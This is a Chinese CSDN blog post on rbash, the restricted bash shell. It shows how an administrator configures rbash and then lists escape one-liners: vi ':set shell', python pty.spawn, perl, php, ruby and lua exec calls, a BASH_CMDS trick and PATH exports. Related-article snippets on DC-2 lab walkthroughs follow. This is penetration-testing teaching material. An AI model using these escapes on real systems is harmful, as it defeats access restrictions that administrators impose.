rbash绕过及提权

最新推荐文章于 2024-04-03 16:14:32 发布
最新推荐文章于 2024-04-03 16:14:32 发布
阅读量452 收藏 2
点赞数 2
文章标签: 安全 网络安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45654333/article/details/132985853
版权

一、rbash介绍

rbash是Restricted bash缩写,即受限制的bash。

管理员可通过指定普通用户的bash为rbash,以此来限制相关操作。

在rbash中,很多行为和命令都会被受到限制。

确切说不属于提权,只是绕过rbash的限制,因为绕过后身份依旧是当前的普通账户。

二、设置bash限制

1,复制一个bash,重命名为rbash

        cp  /bin/bash  /bin/rbash

2,设置用户tom登陆的shell为rbash

        useradd -s  /bin/rbash  tom

3,  在tom用户下新建一个.bin目录存放可以执行的命令

        mkdir -p  /home/tom/.bin

4,  通过软连接执行命令

        ln -s  /bin/clear  /home/$tom/.bin/clear

5,  编辑文件/home/$tom/.bashrc,添加export PATH=$HOME/.bin/.
文件一定要以# .bashrc为首行.

三、绕过rbash限制

1.检查可使用的命令,比如:cat/cd/su/sudo/vim/vi等;

写入脚本 vi  xxx.txt 然后 :set shell=/bin/bash或者 :set shell=/bin/sh

2.检查可用操作符,比如:<>/\|!@#$%^&*等;

直接输入 /bin/sh 或者/bin/bash

3.root身份可以运行的命令:sudo -l;

查看 哪个运行命令是root权限

4.检查shell:echo $SHELL;

# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
:shell
 
# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

5.检查可用的编程语言:java,python,php,ruby,perl等;

python
python -c "import os;os.system('/bin/bash')"
或者
python -c "import pty;pty.spawn('/bin/bash')"
php
php -a then exec("sh -i")
perl
perl -e "exec '/bin/sh';"
lua
os.execute('/bin/sh')
ruby
exec "/bin/sh"

6.检查环境变量:运行env或者printenv.
# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a
 
# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

不想打工的打工狗
关注
jhdecfjedeihedkdejfoeasdsj:5rbash..msa
04-28
标题 "jhdecfjedeihedkdejfoeasdsj:5rbash..msa" 和描述 "jhdecfjedeihedkdejfoeasdsj 5rbash..msa" 看起来像是随机生成的字符串,并没有提供明显的IT知识主题。不过,考虑到提供的标签是"JavaScript",我们可以推测...
靶机DC-2练习:通过rbash绕过获取shell,使用git命令提权
7Riven's blog
12-24 1859
1.主机发现 靶机IP地址:192.168.109.163 2.扫描目标服务版本 3.发现80端口,访问主页 访问失败 很显然,本地不解析该域名,在/etc/hosts文件中添加即可 再次刷新网页 单击首页左下角 发现flag1:出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息,接下来扫描一下后台目录 4.工具扫描后台目...
【渗透测试】--- rbash逃逸方法简述
qq_43168364的博客
12-29 4540
一、rbash简述 1.什么是rbash 它与一般shell的区别在于会限制一些行为,让一些命令无法执行 2.如何设置一个rbash cp /bin/bash /bin/rbash # 复制一个bash,重命名为rbash useradd -s /bin/rbash test # 设置用户test登陆的shell为rbash mkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令 二、枚举Linux环境 1.检查可用的命令 如 cd、ls、su
linux进行rbash逃逸的方法
u013930899的博客
09-12 1201
rbash逃逸方法步骤
linux bash r,rbash限制的 bash
weixin_36213934的博客
05-16 553
rbash(restricted bash),即受限制的 bash,对于用作中转服务器,还是很不错滴。rbash 支持 debian 以及 rh。rbash 只是 bash 的一个软链接。除了这里提到的几个方面之外,它跟 bash 一样。* changing directories with cd* setting or unsetting the values of SHELL, PATH, E...
rbash环境变量提权
longwanlian的博客
01-19 508
实验环境——vulnhub-dc2靶场。可通过环境变量提权方式,越过此限制。lnhub-dc2靶场。
rbash绕过
weixin_43705814的博客
12-29 3372
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进行限制呢,有以下几个原因: 1.提高安全性,防止黑客和渗透测试人员的入侵 2.限制一些会对系统造成危害的危险命令 3.为了提高渗透测试人员的个人能力,在一些靶机上设置受限的shell让测试人员绕过拿flag 二、常见的绕过方法 2.
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 ...绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
harden.sh:Slackware强化脚本
04-12
通过modprobe禁止使用某些内核模块禁用配置外壳创建一个选项以使用受限制的外壳( rbash ) 还将其设置为新用户的默认值限制可用shell的数量( /etc/shells ) 如果安装了审核,则基于stig.rules配置基本审核注意:...
hexo网站部署到云服务器的详细步骤新手指南.pdf
09-13
/bin/rbash /usr/bin/tmux /usr/bin/screen /usr/bin/git-shell ``` 使用命令 which git-shell 判断系统是否安装了 git-shell。如果已经安装,则返回 git-shell 的安装目录,如:/usr/bin/git-shell;如果未安装则...
bash笔记-01-intro .doc
09-08
- **受限版Bash (rbash)**:提供了一个受限的Shell环境,用于限制用户执行特定命令的能力,提高安全性。 #### 三、Bash命令执行机制 - **命令执行类型**: - **可执行程序**:当执行非Bash内置命令时,Bash会...
rbash限制以及绕过
qq_60848021的博客
04-09 888
rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一个软链接)。它与一般shell的区别在于会限制一些行为,让一些命令无法执行。
linux rbash逃逸介绍
有勇气的牛排博客
07-22 537
1 rbash介绍 rbash 与一般shell的区别在于会限制一些行为,让一些命令无法执行。 如何设置rbash cp /bin/bash /bin/rbash # 复制一个bash,重命名为rbash useradd -s /bin/rbash test # 设置用户test登陆的shell为rbash mkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令 2检查当前shell是否为rbash cd .. cd /home 输出:-
靶机 DC-2
m0_66299232的博客
09-13 1051
rbash是什么?rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。1>如何设置一个rbashcp /bin/bash /bin/rbash # 复制一个bash,重命名为rbashmkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令2>rbash提权export -p //查看环境变量a //把/bin/sh给a/bin/bash
shell命令sh、dash、bash、rbash的区别
云袂的博客
05-06 2063
1、查看当前系统支持的shell类型 $ cat /etc/shells # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash 2、查看系统默认shell $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash 3、命令比对 $ ll /bin/sh lrwxrwxrwx 1 root root 4 3月 2 2016 /bin/sh -> d
权限提升-Linux系统权限提升篇&Vulnhub&Rbash绕过&Docker&LXD容器&History泄漏&shell交互
最新发布
siu~
04-03 1546
1、普通用户到Linux-泄漏-History 2、普通用户到Linux-限制-Rbash绕过 3、普通用户到Linux-容器-LXD&Docker 4.Linux系统提权-web/普通用户-docker逃逸&提权&shell交互 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
linux限制用户可用命令,如何使用rbash限制用户访问Linux系统指定命令 互联网技术圈 互联网技术圈...
weixin_42371226的博客
04-29 1302
我的一位朋友问我如何允许用户只执行某些任务,并执行某些命令。用户不应更改环境变量/路径,不能访问除主目录以外的其他目录,不能切换到其他用户等。用户只能执行系统管理员分配的少量命令。那可能吗?是!这是Restricted Shell提供帮助的地方。使用Restricted Shell,我们可以轻松限制用户对Linux系统的访问。将用户置于受限shell模式后,只允许他们执行有限的命令集。在这个简短...
Rbash绕过
weixin_54252904的博客
04-17 558
Rbash VI绕过 vi:set shell=/bin/sh 运行shell:shell export PATH=/usr/sbin:/usr/bin:/sbin:/bin CP绕过 cp 环境变量绕过 BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量` export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出 export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1987
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值